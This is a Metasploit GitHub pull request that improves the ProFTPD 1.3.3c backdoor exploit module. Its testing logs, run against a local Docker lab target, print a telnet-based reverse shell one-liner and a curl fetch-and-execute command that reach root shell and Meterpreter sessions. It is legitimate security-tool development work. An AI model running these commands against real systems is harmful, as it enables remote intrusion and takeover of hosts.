Skip to content

proftpd_133c_backdoor: Various improvements#21381

Merged
jheysel-r7 merged 5 commits into
rapid7:masterfrom
g0tmi1k:proftpd_133c_backdoor
Jun 19, 2026
Merged

proftpd_133c_backdoor: Various improvements#21381
jheysel-r7 merged 5 commits into
rapid7:masterfrom
g0tmi1k:proftpd_133c_backdoor

Conversation

@g0tmi1k

@g0tmi1k g0tmi1k commented Apr 27, 2026

Copy link
Copy Markdown
Contributor

This PR is to:

  • Add a check() function
  • Update module metadata (notes)
  • Add fetch payload support
  • Able to be more verbose
        current  name     hosts  services  vulns  creds  loots  notes
        -------  ----     -----  --------  -----  -----  -----  -----
Before: *        default  1      2         1      0      0      1
After : *        default  1      2         1      0      0      3

Target is a container.

Setup

$ docker run --rm -p 2121:21 -p 40000-40100:40000-40100 --name proftpd registry.gitlab.com/g0tmi1k/proftpd-docker:1.3.3c
957886ff9327 - ProFTPD 1.3.3c (maint) (built Mon Apr 27 2026 11:29:16 UTC) standalone mode STARTUP

Before

  • Had to select a payload before it would run
  • No check
$ ./msfconsole -q -x 'db_status; workspace -D;
setg VERBOSE true; setg RHOSTS 127.0.0.1; setg LHOST docker0;
use exploit/unix/ftp/proftpd_133c_backdoor;
set RPORT 2121;'
[*] Connected to msf. Connection type: postgresql.
[*] Deleted workspace: default
[*] Recreated the default workspace
VERBOSE => true
RHOSTS => 127.0.0.1
LHOST => docker0
RPORT => 2121
msf exploit(unix/ftp/proftpd_133c_backdoor) > check
[-] This module does not support check.
msf exploit(unix/ftp/proftpd_133c_backdoor) > run
[-] 127.0.0.1:2121 - Exploit failed: A payload has not been selected.
[*] Exploit completed, but no session was created.
msf exploit(unix/ftp/proftpd_133c_backdoor) > set PAYLOAD payload/cmd/unix/reverse
PAYLOAD => cmd/unix/reverse
msf exploit(unix/ftp/proftpd_133c_backdoor) > run
[+] sh -c '(sleep 4124|telnet 172.17.0.1 4444|while : ; do sh && break; done 2>&1|telnet 172.17.0.1 4444 >/dev/null 2>&1 &)'
[*] Started reverse TCP double handler on 172.17.0.1:4444
[*] 127.0.0.1:2121 - Connecting to FTP server...
[*] 127.0.0.1:2121 - Connected to target FTP server
[*] 127.0.0.1:2121 - Sending Backdoor Command
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo N81yL1lITDnUhqcY;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "N81yL1lITDnUhqcY\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (172.17.0.1:4444 -> 172.17.0.2:44842) at 2026-05-21 10:55:26 +0100

id
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
^Z
Background session 1? [y/N]  y
msf exploit(unix/ftp/proftpd_133c_backdoor) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      2         1      0      0      1

msf exploit(unix/ftp/proftpd_133c_backdoor) > hosts

Hosts
=====

address    mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------    ---  ----  -------  ---------  -----  -------  ----  --------
127.0.0.1             Unknown                    device

msf exploit(unix/ftp/proftpd_133c_backdoor) > services
Services
========

host       port  proto  name  state  info                                                 resource  parents
----       ----  -----  ----  -----  ----                                                 --------  -------
127.0.0.1  2121  tcp    ftp   open   ProFTPD 1.3.3c Server (ProFTPD Docker Installation)  {}        tcp (2121/tcp)
127.0.0.1  2121  tcp    tcp   open                                                        {}

msf exploit(unix/ftp/proftpd_133c_backdoor) > vulns

Vulnerabilities
===============

Timestamp                Host       Service         Resource  Name                                       References
---------                ----       -------         --------  ----                                       ----------
2026-05-21 09:55:25 UTC  127.0.0.1  ftp (2121/tcp)  {}        ProFTPD 1.3.3c Backdoor Command Execution  CVE-2010-20103,OSVDB-69562,BID-45150

msf exploit(unix/ftp/proftpd_133c_backdoor) > notes

Notes
=====

 Time                     Host       Service  Port  Protocol  Type        Data
 ----                     ----       -------  ----  --------  ----        ----
 2026-05-21 09:55:08 UTC  127.0.0.1  ftp      2121  tcp       ftp.banner  {:banner=>"220 ProFTPD 1.3.3c Server (ProFTPD Docker Installation) [172.17.0.2]"}

msf exploit(unix/ftp/proftpd_133c_backdoor) >

After

  • More verbose
  • Check support
$ ./msfconsole -q -x 'db_status; workspace -D;
setg VERBOSE true; setg RHOSTS 127.0.0.1; setg LHOST docker0;
use exploit/unix/ftp/proftpd_133c_backdoor;
set RPORT 2121;'
[*] Connected to msf. Connection type: postgresql.
[*] Deleted workspace: default
[*] Recreated the default workspace
VERBOSE => true
RHOSTS => 127.0.0.1
LHOST => docker0
[*] Using configured payload cmd/linux/http/x86/meterpreter_reverse_tcp
RPORT => 2121
msf exploit(unix/ftp/proftpd_133c_backdoor) > check
[*] 127.0.0.1:2121 - Connecting to FTP server...
[*] 127.0.0.1:2121 - Connected to target FTP server
[*] 127.0.0.1:2121 - FTP Banner: ProFTPD 1.3.3c
[*] 127.0.0.1:2121 - ProFTPD 1.3.3c detected, testing for backdoor command...
[+] 127.0.0.1:2121 - The target appears to be vulnerable. No response to backdoor command, so server may have dropped into shell mode
msf exploit(unix/ftp/proftpd_133c_backdoor) >
msf exploit(unix/ftp/proftpd_133c_backdoor) > run
[*] Command to run on remote host: curl -so ./NttRBpQidN http://172.17.0.1:8080/-j0Kg1-XEKLxv08PWln5tg;chmod +x ./NttRBpQidN;./NttRBpQidN&
[*] Fetch handler listening on 172.17.0.1:8080
[*] HTTP server started
[*] Adding resource /-j0Kg1-XEKLxv08PWln5tg
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] 127.0.0.1:2121 - Running automatic check ("set AutoCheck false" to disable)
[*] 127.0.0.1:2121 - Connecting to FTP server...
[*] 127.0.0.1:2121 - Connected to target FTP server
[*] 127.0.0.1:2121 - FTP Banner: ProFTPD 1.3.3c
[*] 127.0.0.1:2121 - ProFTPD 1.3.3c detected, testing for backdoor command...
[+] 127.0.0.1:2121 - The target appears to be vulnerable. No response to backdoor command, so server may have dropped into shell mode
[*] 127.0.0.1:2121 - Connecting to FTP server...
[*] 127.0.0.1:2121 - Connected to target FTP server
[*] 127.0.0.1:2121 - FTP Banner: ProFTPD 1.3.3c
[*] 127.0.0.1:2121 - Sending FTP command to trigger backdoor
[*] 127.0.0.1:2121 - Running: nohup curl -so ./NttRBpQidN http://172.17.0.1:8080/-j0Kg1-XEKLxv08PWln5tg;chmod +x ./NttRBpQidN;./NttRBpQidN& >/dev/null 2>&1
[*] 127.0.0.1:2121 - Payload sent — awaiting callback
[*] Client 172.17.0.2 requested /-j0Kg1-XEKLxv08PWln5tg
[*] Sending payload to 172.17.0.2 (curl/8.14.1)
[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.2:36250) at 2026-05-21 11:01:52 +0100

meterpreter > background
[*] Backgrounding session 1...
msf exploit(unix/ftp/proftpd_133c_backdoor) > workspace -vf

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      2         1      0      0      3

msf exploit(unix/ftp/proftpd_133c_backdoor) > hosts

Hosts
=====

address    mac  name          os_name                                 os_flavor  os_sp  purpose  info  comments
-------    ---  ----          -------                                 ---------  -----  -------  ----  --------
127.0.0.1       3c6646e4ea9c  Debian 13.4 (Linux 6.19.11+kali-amd64)                    server

msf exploit(unix/ftp/proftpd_133c_backdoor) > services
Services
========

host       port  proto  name  state  info            resource  parents
----       ----  -----  ----  -----  ----            --------  -------
127.0.0.1  2121  tcp    ftp   open   ProFTPD 1.3.3c  {}        tcp (2121/tcp)
127.0.0.1  2121  tcp    tcp   open                   {}

msf exploit(unix/ftp/proftpd_133c_backdoor) > vulns

Vulnerabilities
===============

Timestamp                Host       Service         Resource  Name                                       References
---------                ----       -------         --------  ----                                       ----------
2026-05-21 10:01:22 UTC  127.0.0.1  ftp (2121/tcp)  {}        ProFTPD 1.3.3c Backdoor Command Execution  CVE-2010-20103,OSVDB-69562,BID-45150

msf exploit(unix/ftp/proftpd_133c_backdoor) > notes

Notes
=====

 Time                     Host       Service  Port  Protocol  Type                         Data
 ----                     ----       -------  ----  --------  ----                         ----
 2026-05-21 10:01:12 UTC  127.0.0.1  ftp      2121  tcp       ftp.banner                   {:banner=>"220 ProFTPD 1.3.3c Server (ProFTPD Docker Installation) [172.17.0.2]"}
 2026-05-21 10:01:12 UTC  127.0.0.1  ftp      2121  tcp       ftp.cpe                      {:cpe=>"cpe:/a:proftpd:proftpd:1.3.3c"}
 2026-05-21 10:01:52 UTC  127.0.0.1                           host.os.session_fingerprint  {:name=>"3c6646e4ea9c", :os=>"Debian 13.4 (Linux 6.19.11+kali-amd64)", :arch=>"x64"}

msf exploit(unix/ftp/proftpd_133c_backdoor) >

@g0tmi1k g0tmi1k force-pushed the proftpd_133c_backdoor branch 4 times, most recently from bd308de to 53e084a Compare April 30, 2026 11:58
@g0tmi1k g0tmi1k changed the title proftpd_133c_backdoor: Add check and fetch payloads proftpd_133c_backdoor: Various improvements May 4, 2026
@g0tmi1k g0tmi1k force-pushed the proftpd_133c_backdoor branch 5 times, most recently from be9061b to 60e8337 Compare May 5, 2026 17:47
@g0tmi1k

g0tmi1k commented May 5, 2026

Copy link
Copy Markdown
Contributor Author

This now needs #21380 to be merged ahead of time.

@g0tmi1k g0tmi1k force-pushed the proftpd_133c_backdoor branch 6 times, most recently from d643d4d to 1407401 Compare May 12, 2026 05:36
Comment thread modules/exploits/unix/ftp/proftpd_133c_backdoor.rb Outdated
Comment thread modules/exploits/unix/ftp/proftpd_133c_backdoor.rb Outdated
Comment thread modules/exploits/unix/ftp/proftpd_133c_backdoor.rb Outdated
Comment thread modules/exploits/unix/ftp/proftpd_133c_backdoor.rb
@g0tmi1k g0tmi1k force-pushed the proftpd_133c_backdoor branch from 1407401 to 0ef5bf2 Compare May 14, 2026 15:48
@g0tmi1k

g0tmi1k commented May 14, 2026

Copy link
Copy Markdown
Contributor Author

Thanks for the taking the time to review and feedback @msutovsky-r7.
I think Ive addressed all the issues you flagged up (force pushed).

@g0tmi1k g0tmi1k requested a review from msutovsky-r7 May 14, 2026 15:50
@g0tmi1k g0tmi1k force-pushed the proftpd_133c_backdoor branch 3 times, most recently from e295986 to 5c04837 Compare May 18, 2026 09:45
@g0tmi1k g0tmi1k force-pushed the proftpd_133c_backdoor branch 2 times, most recently from 1c2ea2f to 738aa32 Compare May 21, 2026 09:52
@g0tmi1k

g0tmi1k commented May 21, 2026

Copy link
Copy Markdown
Contributor Author

Think I've finished tweaking with this PR!

Doesn't need it, but also did have #21416 & #21396 applied in the 'after' testing (not before).

@g0tmi1k g0tmi1k force-pushed the proftpd_133c_backdoor branch from 738aa32 to dd1c4bd Compare May 26, 2026 14:29

@jheysel-r7 jheysel-r7 left a comment

Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thanks for the PR @g0tmi1k. Looks good - a couple minor changes requested and I'll get this landed 👍

Testing

msf exploit(unix/ftp/proftpd_133c_backdoor) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf exploit(unix/ftp/proftpd_133c_backdoor) > set rport 2121
rport => 2121
msf exploit(unix/ftp/proftpd_133c_backdoor) > run
[*] Started reverse TCP handler on 192.168.3.8:4444
[*] 127.0.0.1:2121 - Running automatic check ("set AutoCheck false" to disable)
[*] 127.0.0.1:2121 - ProFTPD 1.3.3c detected, testing for backdoor command...
[+] 127.0.0.1:2121 - The target appears to be vulnerable. No response to backdoor command, so server may have dropped into shell mode
[*] 127.0.0.1:2121 - Sending FTP command to trigger backdoor
[*] 127.0.0.1:2121 - Payload sent - awaiting callback
[*] Meterpreter session 1 opened (192.168.3.8:4444 -> 192.168.3.8:53234) at 2026-06-09 12:11:31 -0700

meterpreter > getuid
Server username: root
smeterpreter > sysinfo
Computer     : f381d943475a
OS           : Debian 13.4 (Linux 6.12.76-linuxkit)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > bg
[*] Backgrounding session 1...

Comment thread modules/exploits/unix/ftp/proftpd_133c_backdoor.rb Outdated
Comment thread modules/exploits/unix/ftp/proftpd_133c_backdoor.rb Outdated
Comment thread modules/exploits/unix/ftp/proftpd_133c_backdoor.rb
@jheysel-r7 jheysel-r7 self-assigned this Jun 9, 2026
@jheysel-r7 jheysel-r7 added enhancement rn-enhancement release notes enhancement labels Jun 9, 2026
@jheysel-r7 jheysel-r7 moved this from Todo to Waiting on Contributor in Metasploit Kanban Jun 9, 2026
@g0tmi1k g0tmi1k force-pushed the proftpd_133c_backdoor branch from dd1c4bd to ceaac36 Compare June 15, 2026 12:45
@g0tmi1k g0tmi1k requested a review from jheysel-r7 June 15, 2026 12:45
@g0tmi1k

g0tmi1k commented Jun 15, 2026

Copy link
Copy Markdown
Contributor Author

Hey @jheysel-r7 - thanks for taking the time to review this.
I think I've addressed everything - please let me know if something can be improved on.

$ ./msfconsole -q -x 'db_status; workspace -D;
setg VERBOSE true; setg RHOSTS 127.0.0.1; setg LHOST docker0;
use exploit/unix/ftp/proftpd_133c_backdoor;
set RPORT 2121;'
[*] Connected to msf. Connection type: postgresql.
[*] Deleted workspace: default
[*] Recreated the default workspace
VERBOSE => true
RHOSTS => 127.0.0.1
LHOST => docker0
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
RPORT => 2121
msf exploit(unix/ftp/proftpd_133c_backdoor) >
msf exploit(unix/ftp/proftpd_133c_backdoor) > run
[*] Command to run on remote host: curl -so ./yCvcnxED http://172.17.0.1:8080/6-QSk_1Z4L51LCLriobShA;chmod +x ./yCvcnxED;./yCvcnxED&
[*] Fetch handler listening on 172.17.0.1:8080
[*] HTTP server started
[*] Adding resource /6-QSk_1Z4L51LCLriobShA
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] 127.0.0.1:2121 - Running automatic check ("set AutoCheck false" to disable)
[*] 127.0.0.1:2121 - Connecting to FTP server...
[*] 127.0.0.1:2121 - Connected to target FTP server
[*] 127.0.0.1:2121 - FTP Banner: ProFTPD 1.3.3c Server (ProFTPD Docker Installation)
[*] 127.0.0.1:2121 - ProFTPD 1.3.3c detected, testing for backdoor command...
[+] 127.0.0.1:2121 - The target appears to be vulnerable. No response to backdoor command, so server may have dropped into shell mode
[*] 127.0.0.1:2121 - Connecting to FTP server...
[*] 127.0.0.1:2121 - Connected to target FTP server
[*] 127.0.0.1:2121 - FTP Banner: ProFTPD 1.3.3c Server (ProFTPD Docker Installation)
[*] 127.0.0.1:2121 - Sending FTP command to trigger backdoor
[*] 127.0.0.1:2121 - Running: nohup curl -so ./yCvcnxED http://172.17.0.1:8080/6-QSk_1Z4L51LCLriobShA;chmod +x ./yCvcnxED;./yCvcnxED& >/dev/null 2>&1
[*] 127.0.0.1:2121 - Payload sent - awaiting callback
[*] Client 172.17.0.2 requested /6-QSk_1Z4L51LCLriobShA
[*] Sending payload to 172.17.0.2 (curl/8.14.1)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 172.17.0.2
[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.2:37986) at 2026-06-15 13:44:28 +0100

meterpreter > sysinfo
Computer     : XXX
OS           : Debian 13.4 (Linux 6.19.14+kali-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

@jheysel-r7 jheysel-r7 moved this from Waiting on Contributor to Waiting on Review in Metasploit Kanban Jun 15, 2026
@github-project-automation github-project-automation Bot moved this from Waiting on Review to In Progress in Metasploit Kanban Jun 19, 2026
@jheysel-r7 jheysel-r7 merged commit be2d456 into rapid7:master Jun 19, 2026
18 checks passed
@github-project-automation github-project-automation Bot moved this from In Progress to Done in Metasploit Kanban Jun 19, 2026
@jheysel-r7

Copy link
Copy Markdown
Contributor

Release Notes

This adds a number of improvement to the proftpd_133c_backdoor module. It adds a check method, updates module metadata and improves the verbosity of logging.

@g0tmi1k g0tmi1k deleted the proftpd_133c_backdoor branch June 19, 2026 20:46
@g0tmi1k

g0tmi1k commented Jun 19, 2026

Copy link
Copy Markdown
Contributor Author

Cheers @jheysel-r7 !

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

enhancement rn-enhancement release notes enhancement

Projects

Archived in project

Development

Successfully merging this pull request may close these issues.

4 participants